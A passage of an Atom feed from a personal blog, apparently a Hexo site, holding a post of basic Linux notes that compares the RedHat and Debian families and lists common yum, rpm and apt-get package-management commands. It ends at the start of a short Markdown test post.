<content type="html"><![CDATA[<h1 id="一般来说著名的linux系统基本上分两大类:"><a href="#一般来说著名的linux系统基本上分两大类:" class="headerlink" title="一般来说著名的linux系统基本上分两大类:"></a>Generally, the well-known Linux distributions fall into two main families:</h1><p>1. RedHat family: Redhat, Centos, Fedora, etc.<br>2. Debian family: Debian, Ubuntu, etc. </p><h2 id="RedHat-系列"><a href="#RedHat-系列" class="headerlink" title="RedHat 系列"></a>RedHat family</h2><p>1 Common package format: rpm packages, installed with "rpm -options"<br>2 Package manager: yum<br>3 tar archives are supported </p><h2 id="Debian系列"><a href="#Debian系列" class="headerlink" title="Debian系列"></a>Debian family</h2><p>1 Common package format: deb packages, installed with "dpkg -options"<br>2 Package manager: apt-get<br>3 tar archives are supported </p><h3 id="一、yum安装。"><a href="#一、yum安装。" class="headerlink" title="一、yum安装。"></a>1. Installing with yum</h3><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">yum commands for installing common software</span><br><span class="line"><span class="meta">#</span><span class="bash">yum check-update</span></span><br><span class="line"><span class="meta">#</span><span class="bash">yum remove package_name</span></span><br><span class="line"><span class="meta">#</span><span class="bash">yum install package_name</span></span><br><span class="line"><span class="meta">#</span><span class="bash">yum update package_name</span></span><br><span class="line">Common ways of using the yum command</span><br><span class="line">yum -y install package_name (wildcard * supported) : answers y automatically, fully unattended</span><br><span class="line">yum install package_name (wildcard * supported) : asks you to choose y or n</span><br><span class="line">yum remove package_name (wildcard * not supported)</span><br><span class="line">rpm -ivh package_name (wildcard * supported) : install an rpm package</span><br><span class="line">rpm -e package_name (wildcard * not supported) : uninstall an rpm package</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure><h3 id="二、apt-get安装。"><a href="#二、apt-get安装。" class="headerlink" title="二、apt-get安装。"></a>2. Installing with apt-get</h3><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">apt-cache search package   search for a package</span><br><span class="line">apt-cache show package   show package information such as description, size and version</span><br><span class="line">sudo apt-get install package   install a package</span><br><span class="line">sudo apt-get install package --reinstall   reinstall a package</span><br><span class="line">sudo apt-get -f install   fix a broken installation</span><br><span class="line">sudo apt-get remove package   remove a package</span><br><span class="line">sudo apt-get remove package --purge   remove a package together with its configuration files</span><br><span class="line">sudo apt-get update   refresh the package lists from the sources</span><br><span class="line">sudo apt-get upgrade   upgrade the installed packages</span><br><span class="line">sudo apt-get dist-upgrade   upgrade the system</span><br><span class="line">apt-cache depends package   list the packages this package depends on</span><br><span class="line">apt-cache rdepends package   list the packages that depend on this package</span><br><span class="line">sudo apt-get build-dep package   install the build dependencies for the package</span><br><span class="line">apt-get source package   download the package's source code</span><br><span class="line">sudo apt-get clean && sudo apt-get autoclean   clean up unneeded package files</span><br><span class="line">sudo apt-get check   check for broken dependencies</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>]]></content>
<summary type="html"><h1 id="一般来说著名的linux系统基本上分两大类:"><a href="#一般来说著名的linux系统基本上分两大类:" class="headerlink" title="一般来说著名的linux系统基本上分两大类:"></a>Generally, the well-known Linux distributions fall into two main</summary>
<category term="Linux" scheme="https://cr4ckm3.top/tags/Linux/"/>
<category term="笔记" scheme="https://cr4ckm3.top/tags/%E7%AC%94%E8%AE%B0/"/>
</entry>
<entry>
<title>Markdown</title>
<link href="https://cr4ckm3.top/2016/08/28/Markdown/"/>
<id>https://cr4ckm3.top/2016/08/28/Markdown/</id>
<published>2016-08-28T02:47:54.000Z</published>
<updated>2019-08-30T10:00:39.803Z</updated>
<content type="html"><</code></p>]]></content>
<summary type="html"><h1 id="test"><a href="#test" class="headerlink" title="test"></a>test</h1><p><code># test</code> level-1 heading</p>
<p><code>&lt;!--more--&gt;</code></summary>
<category term="Markdown" scheme="https://cr4ckm3.top/tags/Markdown/"/>
<category term="test" scheme="https://cr4ckm3.top/tags/test/"/>
</entry>
</feed>